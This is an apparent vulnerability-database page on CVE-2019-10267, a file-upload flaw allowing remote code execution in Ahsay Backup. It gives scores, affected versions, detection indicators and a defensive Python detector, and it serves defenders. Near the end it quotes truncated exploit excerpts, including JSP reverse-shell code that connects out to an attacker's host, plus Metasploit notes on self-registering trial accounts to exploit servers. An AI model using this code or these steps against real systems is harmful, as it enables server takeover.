CVE-2019-10267
Published 2019-07-26
Priority: P1 · 80 · high · CVSS 3.0: 8.8
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 75.77% (99.5th percentile)
An insecure file upload and code execution issue was discovered in Ahsay Cloud Backup Suite 8.1.0.50. It is possible to upload a file into any directory of the server. One can insert a JSP shell into the web server's directory and execute it. This leads to full access to the system, as the configured user (e.g., Administrator).
Affected
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ahsay | cloud_backup_suite | >= 7.7.0.0 < 8.1.1.50 | 8.1.1.50 |
Detection & IOCs (extracted from sources)
- Detect the exploit by monitoring HTTP PUT requests to /obs/obm7/file/upload with the custom headers X-RSW-Request-0, X-RSW-Request-1, and X-RSW-custom-encode-path present simultaneously; these are the authentication and path-encoding headers used by the exploit.
- Alert on HTTP PUT requests to /obs/obm7/file/upload where the uploaded body contains .jsp content, indicating a JSP webshell upload attempt.
- Monitor for POST requests to /obs/obm7/user/isTrialEnabled returning 'ENABLED' followed immediately by a POST to /obs/obm7/user/addTrialUser; this sequence indicates automated trial account creation as a precursor to exploitation.
- Alert on GET requests to /cbs/system/ShowDownload.do followed by a GET to /cbs/system/download/indexTab1.jsp; this is the version-check sequence used by the exploit's check() function to fingerprint vulnerable Ahsay instances.
- The exploit requires valid credentials; however, if the Ahsay server has trial accounts enabled (ENABLED response from /obs/obm7/user/isTrialEnabled), an attacker can self-register an account before exploiting, so no pre-existing credentials are needed in that case.
- The default upload path used by the exploit is '../../webapps/cbs/help/en'; defenders should ensure this path (and the resulting web-accessible directory) is monitored for unexpected .jsp or .exe file creation.
- The exploit uses SSL/HTTPS on port 443 by default; TLS inspection is required to detect the malicious headers and payload in transit.
- The exploit performs cleanup (deletes uploaded .exe, .jsp, and user account files) after execution, so forensic artifacts may be limited; focus detection on the upload and trigger phases rather than post-exploitation file presence.
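The four request patterns listed above can be combined into one pass over decrypted HTTP transaction records. The following is an added example, not code from this page or from any vendor rule set. It assumes a hypothetical event schema (`ts`, `client`, `method`, `path`, `headers`, `body`, `response`) such as a TLS-inspecting proxy might export, a 60-second window for "followed by", and `<%` as the marker for JSP content in an upload body.

```python
from collections import defaultdict

UPLOAD = "/obs/obm7/file/upload"
RSW_HEADERS = {"x-rsw-request-0", "x-rsw-request-1", "x-rsw-custom-encode-path"}
# (first request, text required in its response or None, second request, alert name)
SEQUENCES = [
    (("POST", "/obs/obm7/user/isTrialEnabled"), "ENABLED",
     ("POST", "/obs/obm7/user/addTrialUser"), "trial-account-creation"),
    (("GET", "/cbs/system/ShowDownload.do"), None,
     ("GET", "/cbs/system/download/indexTab1.jsp"), "version-fingerprint"),
]
WINDOW = 60  # seconds allowed between the two requests of a sequence (assumed)

def detect(events):
    """Return sorted (client, alert) pairs for a time-ordered list of event dicts."""
    alerts = set()
    pending = defaultdict(dict)  # client -> {alert name: time of first request}
    for ev in events:
        client, req = ev["client"], (ev["method"], ev["path"].split("?")[0])
        if req == ("PUT", UPLOAD):
            names = {h.lower() for h in ev.get("headers", {})}
            if RSW_HEADERS <= names:  # all three custom headers present together
                alerts.add((client, "rsw-upload-headers"))
            if "<%" in ev.get("body", ""):  # assumed marker for JSP content
                alerts.add((client, "jsp-upload"))
        for first, needle, second, name in SEQUENCES:
            if req == first and (needle is None or needle in ev.get("response", "")):
                pending[client][name] = ev["ts"]
            elif req == second and name in pending[client]:
                if ev["ts"] - pending[client].pop(name) <= WINDOW:
                    alerts.add((client, name))
    return sorted(alerts)

# Constructed sample events (not captured traffic); header values, the "DISABLED"
# response and the addresses (documentation ranges) are placeholders.
SAMPLE = [
    {"ts": 0, "client": "198.51.100.7", "method": "GET", "path": "/cbs/system/ShowDownload.do"},
    {"ts": 1, "client": "198.51.100.7", "method": "GET", "path": "/cbs/system/download/indexTab1.jsp"},
    {"ts": 2, "client": "198.51.100.7", "method": "POST", "path": "/obs/obm7/user/isTrialEnabled", "response": "ENABLED"},
    {"ts": 3, "client": "198.51.100.7", "method": "POST", "path": "/obs/obm7/user/addTrialUser"},
    {"ts": 5, "client": "198.51.100.7", "method": "PUT", "path": UPLOAD,
     "headers": {"X-RSW-Request-0": "a", "X-RSW-Request-1": "b", "X-RSW-custom-encode-path": "c"},
     "body": "<%@ page import=\"java.io.*\" %>"},
    {"ts": 9, "client": "203.0.113.20", "method": "POST", "path": "/obs/obm7/user/isTrialEnabled", "response": "DISABLED"},
    {"ts": 10, "client": "203.0.113.20", "method": "POST", "path": "/obs/obm7/user/addTrialUser"},
    {"ts": 11, "client": "203.0.113.20", "method": "PUT", "path": UPLOAD, "headers": {"X-RSW-Request-0": "a"}, "body": "backup chunk"},
]

if __name__ == "__main__":
    print(*detect(SAMPLE), sep="\n")
```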
CVSS provenance
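| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 8.8 | HIGH | CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 9.0 | CRITICAL | AV:N/AC:L/Au:S/C:C/I:C/A:C |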
No detection rules found.
Exploit-DB
Ahsay Backup 8.1.1.50 - Insecure File Upload and Code Execution (Authenticated)
exploitdb·2019-07-26·CVSS 8.8
---
# Exploit Title: Ahsay Backup 8.1.1.50 - Insecure File Upload and Code Execution (Authenticated)
# Date: 26-6-2019
# Exploit Author: Wietse Boonstra
# Vendor Homepage: https://ahsay.com
# Software Link: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe
# Version: 7.x
0 )
{{
ijb.write( buffer, 0, length );
ijb.flush();
}}
}} catch( Exception e ){{}}
try
{{
if( vo != null )
vo.close();
if( ijb != null )
ijb.close();
}} catch( Exception e ){{}}
}}
}}
try
{{
String ShellPath;
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {{
ShellPath = new String("/bin/sh");
}} else {{
ShellPath = new String("cmd.exe");
}}
Socket socket = new Socket( "{0}", {1} );
Process process = Runtime.getRu
Exploit-DB
Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)
exploitdb·2019-07-26·CVSS 8.8
---
# Exploit Title: Authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. (Metasploit)
# Date: 26-6-2019
# Exploit Author: Wietse Boonstra
# Vendor Homepage: https://ahsay.com
# Software Link: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe
# Version: 7.x 'Ahsay Backup v7.x-v8.1.1.50 (authenticated) file upload',
'Description' => %q{
This module exploits an authenticated insecure file upload and code
execution flaw in Ahsay Backup v7.x - v8.1.1.50. To succesfully execute
the upload credentials are needed, default on Ahsay Backup trial
accounts are enabled so an account can be created.
It can be exploited in Windows and Linux environments to get re
Metasploit
Ahsay Backup v7.x-v8.1.1.50 (authenticated) file upload
metasploit
This module exploits an authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. To successfully execute the upload, credentials are needed; by default, trial accounts are enabled on Ahsay Backup, so an account can be created. It can be exploited in Windows and Linux environments to get remote code execution (usually as SYSTEM). This module has been tested successfully on Ahsay Backup v8.1.1.50 with Windows 2003 SP2 Server. Because of this flaw all connected clients can be configured to execute a command before the backup starts. Allowing an attacker to take over even more systems and make it rain shells! Setting the CREATEACCOUNT to true will create a new account, this is enabled by default. If credential
No writeups or analysis indexed.
- http://packetstormsecurity.com/files/153770/Ahsay-Backup-7.x-8.x-File-Upload-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/153771/Ahsay-Backup-7.x-8.x-File-Upload-Remote-Code-Execution.html
- https://www.wbsec.nl/ahsay/